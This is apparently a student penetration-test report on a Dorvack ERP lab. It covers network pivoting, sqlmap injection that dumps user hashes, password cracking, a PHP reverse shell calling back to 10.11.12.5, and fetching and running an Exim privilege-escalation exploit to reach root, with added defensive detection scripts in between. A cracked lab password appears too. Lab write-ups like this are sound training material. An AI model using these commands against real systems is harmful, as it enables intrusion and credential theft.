Dorvack Erp

Uploaded by Elías Cysoc

Offensive Security

Penetration Test Report for


DOLBUCK DORVACK.ERP
v.3.2

©
All rights reserved to Offensive Security, 2014

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from Offensive Security.

1 | Page
Table of Contents

1.0 Offensive Security Exam Penetration Test Report 2

1.1 Introduction 3

1.2 Objective 3

1.3 Requirements 3

2.0 High-Level Summary 4

2.1 Recommendations 5

3.0 Methodologies 5

3.1 Information Gathering 5

3.2 Penetration 6

System IP: 192.168. () 6

4.0 Additional Items

1.0 Offensive Security Exam Penetration Test Report
1.1 Introduction
The Offensive Security Exam penetration test report contains all efforts that were conducted in order to
pass the Offensive Security exam. This report will be graded from a standpoint of correctness and completeness
in all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding
of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the
Offensive Security Certified Professional.

1.2 Objective
The objective of this assessment is to perform an internal penetration test against the Offensive Security
Exam network. The student is tasked with following a methodical approach in obtaining access to the
objective goals. This test should simulate an actual penetration test and how you would start from beginning
to end, including the overall report. An example page has already been created for you at the latter portions
of this document that should give you ample information on what is expected to pass this course. Use the
sample report as a guideline to get you through the reporting.

1.3 Requirements
The student will be required to fill out this penetration testing report fully and to include the following
sections:

● Overall High-Level Summary and Recommendations (non-technical)
● Methodology walkthrough and detailed outline of steps taken
● Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
● Any additional items that were not included

2.0 High-Level Summary
I was tasked with performing an internal penetration test towards Offensive Security Exam. An internal
penetration test is a dedicated attack against internally connected systems. The focus of this test is to
perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam
systems – the THINC.local domain. My overall objective was to evaluate the network, identify systems,
and exploit flaws while reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming vulnerabilities that were
identified on Offensive Security’s network. When performing the attacks, I was able to gain access to
multiple machines, primarily due to outdated patches and poor security configurations. During the testing,
I had administrative level access to multiple systems. All systems were successfully exploited and access
granted. These systems as well as a brief description on how access was obtained are listed below:

● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - BOF

2.1 Recommendations
I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot
exploit these systems in the future. One thing to remember is that these systems require frequent patching
and once patched, should remain on a regular patch program to protect additional vulnerabilities that are
discovered at a later date.

3.0 Methodologies
I utilized a widely adopted approach to performing penetration testing that is effective in testing how well
the Offensive Security Exam environment is secured. Below is a breakout of how I was able to identify
and exploit the variety of systems, including all individual vulnerabilities found.

3.1 Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration
test. During this penetration test, I was tasked with exploiting the exam network. The specific IP addresses
were:

Exam Network

● 192.168.
● 192.168.
● 192.168.
● 192.168.
● 192.168.

3.2 Penetration
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
During this penetration test, I was able to successfully gain access to X out of the X systems.

System IP: 192.168.1.121

Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what services
are alive on a system or systems. This is valuable for an attacker as it provides detailed information on
potential attack vectors into a system. Understanding what applications are running on the system gives an
attacker needed information before performing the actual penetration test. In some cases, some ports may
not be listed.

Server IP Address    Ports Open
192.168.1.134        TCP: 22/80
                     UDP:

This exercise is a continuation of the previous lab called dorvack.corp and Dorvack Files, so we will use
the SSH credentials obtained previously to connect to the IP 172.20.0.235

sudo ssh user@172.20.0.235

and we will check which connections are known by our server

/usr/sbin/arp -n

We can see that we have a connection to IP 192.168.1.1, but we can't reach that IP directly

In order for the attacker computer to communicate with the IP 192.168.1.1, we will use the Ligolo-ng tool

https://github.com/nicocha30/ligolo-ng

On the Dorvack PC we will do a wget to get the Ligolo agent file

On the attacking computer, we will create a virtual interface for Ligolo

And we'll check that it was created correctly with the -n 1 ip a command

And we add a static route for Ligolo pointing to the victim computer's network

The other Ligolo file, the proxy, will be used from the attacking computer, and we will give it execution
permissions

And we run it; to avoid any certificate problems, we use the -selfcert parameter

Now on the pivot machine we give execution permissions to the agent file and execute it

We go back to the attacking machine, see that Ligolo made the connection to the agent, and start the
tunnel

Now that Ligolo created the connection, we need to create a listener to have a more complete connection
and, if we want, send files between the machines

After this, we can now ping directly from the attacking machine to IP 192.168.1.134

Now that there is a connection, we go to the web browser, and we can see the web ERP service on the IP
192.168.1.134

Now that we have access from the attacking machine with Kali to the 192.168.1.0 segment, we can use the
tools directly; we will use nmap to obtain information from the machine

We will use nmap to obtain information from the server

We will use the sqlmap tool to obtain more information

sqlmap -u http://192.168.1.134/\?nid\= --level 4 --dbs

And in the result, we see 2 databases:


sqlmap -u http://192.168.1.134/\?nid\= --level 4 -D d7db --tables

With this command, we will extract the information from the databases

In the results we see that a table of users appears, we will download their information

sqlmap -u http://192.168.1.134/\?nid\= --level 4 -D d7db -T users --dump
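From the defender's side, the probing of the ?nid= parameter shown above leaves a recognisable trail in the web server's access log. The following Python script is an added example, not part of the report, that flags such requests in constructed Apache-style log lines; the log format, the client IPs and the payload strings are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not taken from the report). Lines 2 and 3
# imitate automated SQL injection probing of the ?nid= parameter; 1 and 4 are normal.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2024:10:00:01 +0000] "GET /?nid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.11.12.5 - - [10/Mar/2024:10:00:05 +0000] "GET /?nid=12%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
10.11.12.5 - - [10/Mar/2024:10:00:06 +0000] "GET /?nid=12%27%20UNION%20SELECT%20NULL,NULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.168.1.51 - - [10/Mar/2024:10:00:09 +0000] "GET /?nid=7 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Crude SQL-syntax indicators; a lone quote is noisy on real traffic, so tune per site.
SQL_SYNTAX_RE = re.compile(r"\bunion\b.*\bselect\b|\b(?:and|or)\b\s+\d+=\d+|'|--|\bsleep\(", re.I)
SCANNER_UA_RE = re.compile(r"sqlmap", re.I)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def decode_query(path):
    """Return (params dict, decoded query string); later duplicate keys win."""
    query = unquote_plus(path.partition("?")[2])
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p), query

def analyze(log_text):
    """Return one finding per request that looks like injection probing of nid."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        params, query = decode_query(entry["path"])
        nid = params.get("nid")
        reasons = []
        if nid is not None and not nid.isdigit():   # nid should be a numeric node id
            reasons.append("non-numeric nid")
        if SQL_SYNTAX_RE.search(query):
            reasons.append("sql syntax in query")
        if SCANNER_UA_RE.search(entry["ua"]):
            reasons.append("scanner user-agent")
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "nid": nid, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A user-agent match alone is weak evidence, since the string is trivially changed; the non-numeric nid check is the one that survives that.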

3 users have been found, but only 2 hashes. We copy and save them in a .txt file and use the john tool with the
rockyou wordlist to try to obtain the passwords from the hashes; if the rockyou file is not there, download
it from GitHub and rename it to rockyou.lst

The wordlist path is /usr/share/wordlists

We copy the hash.txt file with the hashes obtained to the wordlists path and run the john tool

Now that we got the password “alaturideingeri”, let's go to the website

And we will proceed to log in with the credentials of john:alaturideingeri

With the session started we will proceed to explore the site, and as we saw, there is an option to upload
content, and in its options you can edit the HTML with PHP options

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

So we will go to github and copy the reverse shell php code

And we will modify only the data that says “change this”

In IP we will put the IP of the VPN 10.11.12.5 and the port of our choice, in our case, 4444

It is important to write a message above the PHP code, since with the code alone the reverse shell presents
errors. We save the changes.

We start a listener on the chosen port

We return to the contact form, complete it and execute the action to force the reverse shell with the
“submit” button

When we check the listening port again, we see that the system has already connected
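The foothold above exists because the site lets an authenticated user submit HTML that is then evaluated as PHP. The following Python is an added example, not part of the report, of how a defender might screen submitted content for server-side code before it is stored or rendered; the sample submissions are constructed for the example.

```python
import html
import re

# Constructed samples of content submitted through a site form or editor
# (not taken from the report's lab).
SAMPLES = {
    "plain":   "<p>Hello, I would like a quote for 20 units.</p>",
    "php_tag": "<p>Hello</p><?php echo shell_exec('id'); ?>",
    "encoded": "&lt;?php passthru($_GET['x']); ?&gt;",
    "short":   "<?= system('whoami') ?>",
}

PHP_OPEN_RE = re.compile(r"<\?(?:php|=)", re.I)
# Functions that run commands, open sockets or evaluate code.
DANGEROUS_FN_RE = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|fsockopen|eval)\s*\(", re.I)

def php_indicators(content):
    """Return a list of indicators that submitted content carries server-side PHP.
    HTML entities are decoded first so an entity-encoded open tag is still seen."""
    decoded = html.unescape(content)
    found = []
    if PHP_OPEN_RE.search(decoded):
        found.append("php open tag")
    for m in DANGEROUS_FN_RE.finditer(decoded):
        found.append("call to " + m.group(1).lower())
    return found

def screen(submissions):
    """Screen a batch of submissions; an empty list means nothing was flagged."""
    return {name: php_indicators(body) for name, body in submissions.items()}

if __name__ == "__main__":
    for name, hits in screen(SAMPLES).items():
        print(f"{name}: {'REJECT ' + ', '.join(hits) if hits else 'ok'}")
```

The stronger fix is to not offer a PHP-evaluating text format to content editors at all; this screen is a backstop for sites that must accept raw HTML.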

We explore the path cd /home and find the first flag inside a file called flag.zip

Exploring the permissions we can see that there is exim4 which is a mail server, and one of the clues in
the lab talked about looking at the mail

So we check the version, and whether it is vulnerable

dpkg -l | grep exim

Exim 4.87 - 4.91 - Local Privilege Escalation

https://www.exploit-db.com/exploits/46996

There is a privilege escalation exploit for exim
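A defender can check whether an installed Exim falls inside the 4.87 to 4.91 range named above from the same dpkg -l output. The Python below is an added example, not from the report; the dpkg lines are constructed, and the version parsing assumes Debian-style version strings.

```python
import re

# Constructed `dpkg -l` output lines (not captured from the report's host).
SAMPLE_DPKG = """\
ii  exim4               4.89-2+deb9u4   all    metapackage to ease Exim MTA (v4) installation
ii  exim4-base          4.89-2+deb9u4   amd64  support files for all Exim MTA (v4) packages
ii  exim4-daemon-light  4.89-2+deb9u4   amd64  lightweight Exim MTA (v4) daemon
ii  libc6               2.24-11+deb9u4  amd64  GNU C Library: Shared libraries
"""

# Range named by the report for the local privilege escalation (inclusive).
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)

def upstream_version(debian_version):
    """Reduce a Debian version string to its upstream (major, minor):
    '1:4.89-2+deb9u4' -> (4, 89). Epoch and Debian revision are dropped."""
    v = debian_version.split(":", 1)[-1]   # drop epoch
    v = v.split("-", 1)[0]                 # drop Debian revision
    nums = re.findall(r"\d+", v)
    return tuple(int(n) for n in nums[:2])

def installed_exim_packages(dpkg_text):
    """Map installed ('ii') exim4* package names to their version strings."""
    pkgs = {}
    for line in dpkg_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "ii" and parts[1].startswith("exim4"):
            pkgs[parts[1]] = parts[2]
    return pkgs

def affected_packages(dpkg_text):
    """Return the installed exim4 packages whose upstream version is in range.
    A match is a prompt to check the distribution's security advisory, since
    Debian backports fixes without changing the upstream version number."""
    return {pkg: ver for pkg, ver in installed_exim_packages(dpkg_text).items()
            if AFFECTED_MIN <= upstream_version(ver) <= AFFECTED_MAX}

if __name__ == "__main__":
    for pkg, ver in affected_packages(SAMPLE_DPKG).items():
        print(f"{pkg} {ver}: upstream version in affected range, check advisories")
```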

We download the exploit and open a terminal

We open a terminal in the same directory as the exploit, check our interfaces to see which one has the VPN
IP, and serve the directory with the command:

ifconfig tun0; sudo python3 -m http.server 80

We will return to the terminal that has the session on the server that opened the reverse shell and we will
go to the path cd /tmp

In this directory we download a copy of the exploit

wget http://10.11.12.5/46996.sh

And with that we see that it was downloaded

We give it execution permissions:

chmod 777 46996.sh

We open another terminal and leave a listening port enabled on the exploit port (this information is within
the exploit itself if we check it with nano or cat)

And we execute the exploit with the command:

bash 46996.sh -m netcat

We run the id command and see that we are root; we go to the /root path with cd /root and we
see the root flag with cat flag.txt
